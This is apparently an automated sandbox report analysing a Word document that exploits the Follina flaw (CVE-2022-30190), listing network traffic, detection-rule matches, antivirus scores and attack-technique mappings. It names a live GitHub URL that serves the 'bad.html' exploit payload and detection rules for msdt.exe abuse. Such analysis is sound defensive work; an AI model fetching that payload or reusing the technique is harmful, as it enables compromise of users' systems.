      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://onedrive.live.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://osi.office.net
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://otelrules.azureedge.net
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://outlook.office.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://outlook.office.com/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://outlook.office365.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://outlook.office365.com/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://pages.store.office.com/review/query
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://roaming.edog.
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://settings.outlook.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://staging.cortana.ai
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://tasks.office.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://webshell.suite.office.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://wus2.contentsync.
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://wus2.pagecontentsync.
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://www.odwebp.svc.ms
      Source: unknown | DNS traffic detected: queries for: raw.githubusercontent.com
      Source: global traffic | HTTP traffic detected: GET /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1
        Accept: */*
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
        Accept-Encoding: gzip, deflate
        Host: raw.githubusercontent.com
        Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
        Host: raw.githubusercontent.com
        Connection: Keep-Alive
      Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49704 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49707 version: TLS 1.2

      System Summary

      Source: document.xml.rels, type: SAMPLE | Matched rule: Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents Author: ditekSHen
      Source: sslproxydump.pcap, type: PCAP | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: document.xml.rels, type: SAMPLE | Matched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
      Source: document.xml.rels, type: SAMPLE | Matched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4C4C1387.txt, type: DROPPED | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4C4C1387.txt, type: DROPPED | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].html, type: DROPPED | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].html, type: DROPPED | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1BDECE2D.txt, type: DROPPED | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1BDECE2D.txt, type: DROPPED | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, Section loaded: sfc.dll
      Source: dl18aYTBo5.docx, Virustotal: Detection: 50%
      Source: dl18aYTBo5.docx, Metadefender: Detection: 20%
      Source: dl18aYTBo5.docx, ReversingLabs: Detection: 27%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: unknown, Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
      Source: dl18aYTBo5.LNK.0.dr, LNK file: ..\..\..\..\..\Desktop\dl18aYTBo5.docx
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Temp\{1E1C1011-FF8D-4BE2-AE04-C2B3A2CB9A76} - OProcSessId.dat
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, File written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
      Source: classification engine, Classification label: mal96.expl.evad.winDOCX@3/15@2/2
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, File read: C:\Users\desktop.ini
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, File read: C:\Windows\System32\drivers\etc\hosts
      Source: Window Recorder, Window detected: More than 3 window changes detected
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, File opened: C:\Windows\SysWOW64\MSVCR100.dll

      Persistence and Installation Behavior

      Source: document.xml.rels, Extracted files from sample: https://raw.githubusercontent.com/drgreenthumb93/cve-2022-30190-follina/main/bad.html!
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, Registry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation
      | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
      |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
      | Valid Accounts | 13 Exploitation for Client Execution | 1 DLL Side-Loading | 1 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Query Registry | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
      | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 3 Non-Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
      | Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 12 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 14 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
      | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 3 Ingress Tool Transfer | SIM Card Swap | | Carrier Billing Fraud |
      | Source | Detection | Scanner | Label | Link |
      |---|---|---|---|---|
      | dl18aYTBo5.docx | 51% | Virustotal | | Browse |
      | dl18aYTBo5.docx | 20% | Metadefender | | Browse |
      | dl18aYTBo5.docx | 28% | ReversingLabs | Document-Word.Exploit.Heuristic | |
      | dl18aYTBo5.docx | 100% | Avira | W97M/Dldr.Agent.G1 | |
      | Source | Detection | Scanner | Label | Link |
      |---|---|---|---|---|
      | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].html | 100% | Avira | JS/CVE-2022-30190.G | |
      No Antivirus matches
      | Source | Detection | Scanner | Label | Link |
      |---|---|---|---|---|
      | raw.githubusercontent.com | 1% | Virustotal | | Browse |
      Source | Detection | Scanner | Label | Link
      | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
      |---|---|---|---|---|---|
      | raw.githubusercontent.com | 185.199.108.133 | true | true | | unknown |
      | Name | Malicious | Antivirus Detection | Reputation |
      |---|---|---|---|
      | https://raw.githubusercontent.com/drgreenthumb93/CVE-2022-30190-follina/main/bad.html | true | 6%, Virustotal, Browse; Avira URL Cloud: safe | unknown |
      Name | Source | Malicious | Antivirus Detection | Reputation
                                                                        https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                          high
                                                                          https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                            high
                                                                            https://learningtools.onenote.com/learningtoolsapi/v2.0/GetvoicesCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                              high
                                                                              https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                high
                                                                                https://ncus.contentsync.CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                  high
                                                                                  https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                    high
                                                                                    http://weather.service.msn.com/data.aspxCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                      high
                                                                                      https://apis.live.net/v5.0/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                        high
                                                                                        https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                          high
                                                                                          https://messaging.lifecycle.office.com/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                            high
                                                                                            https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                              high
                                                                                              https://management.azure.comCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.comCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                  high
                                                                                                  https://wus2.contentsync.CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://incidents.diagnostics.office.comCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                    high
                                                                                                    https://clients.config.office.net/user/v1.0/iosCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                      high
                                                                                                      https://insertmedia.bing.office.net/odc/insertmediaCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                        high
                                                                                                        https://o365auditrealtimeingestion.manage.office.comCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office365.com/api/v1.0/me/ActivitiesCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                            high
                                                                                                            https://api.office.netCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                              high
                                                                                                              https://incidents.diagnosticssdf.office.comCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                high
                                                                                                                https://asgsmsproxyapi.azurewebsites.net/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://clients.config.office.net/user/v1.0/android/policiesCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                  high
                                                                                                                  https://entitlement.diagnostics.office.comCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                    high
                                                                                                                    https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                      high
                                                                                                                      https://substrate.office.com/search/api/v2/initCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                        high
                                                                                                                        https://outlook.office.com/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                          high
                                                                                                                          https://storage.live.com/clientlogs/uploadlocationCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                            high
                                                                                                                            https://outlook.office365.com/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                              high
                                                                                                                              https://webshell.suite.office.comCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                high
                                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://substrate.office.com/search/api/v1/SearchHistoryCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://management.azure.com/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://messaging.lifecycle.office.com/getcustommessage16CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://clients.config.office.net/c2r/v1.0/InteractiveInstallationCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://login.windows.net/common/oauth2/authorizeCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://graph.windows.net/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://api.powerbi.com/beta/myorg/importsCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://devnull.onenote.comCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://messaging.action.office.com/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://ncus.pagecontentsync.CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://messaging.office.com/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                        • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.199.109.133 | unknown | Netherlands | 54113 | FASTLYUS | false
185.199.108.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | true
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 686004
Start date and time: 2022-08-18 03:56:06 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 31s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: dl18aYTBo5.docx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of analysed new started processes analysed: 19
Number of new started drivers analysed: 1
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal96.expl.evad.winDOCX@3/15@2/2
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .docx
• Adjust boot time
• Enable AMSI
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): MpCmdRun.exe, mrxdav.sys, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 52.109.76.141, 52.109.12.24, 52.109.88.40, 52.109.88.39
• Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, europe.configsvc1.live.com.akadns.net
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtQueryAttributesFile calls found.
No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                                                                                                                                        kKdZBhK40w.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          https://home-7f8cd-docs-dj86s-work-dtb03j.teleporthq.app/Get hashmaliciousBrowse
                                                                                                                                                                                                            c39-EmprisaMaldoc.rtfGet hashmaliciousBrowse
                                                                                                                                                                                                              j4SGb5BB2X.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                https://raw.githubusercontent.com/BodgKnK/knkbest/main/KNKCHEATS%20CLIENT%20(NO%20UPDATER%20-%20CHECKER)%20Update%2016-6-2022.rarGet hashmaliciousBrowse
                                                                                                                                                                                                                  Jylly Premium.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                    https://github.com/MindShow/USBDisplay/raw/main/WinDows/MSDisplay_Windows_V2.0.1.7.3.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      HMHxuNQqAg.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                        f8fRVHCGi4.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                          djk33wYmxX.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                            eRjPMfhswq.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              vfk5zQPDm6.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                lZJvRJVfBN.exeGet hashmaliciousBrowse
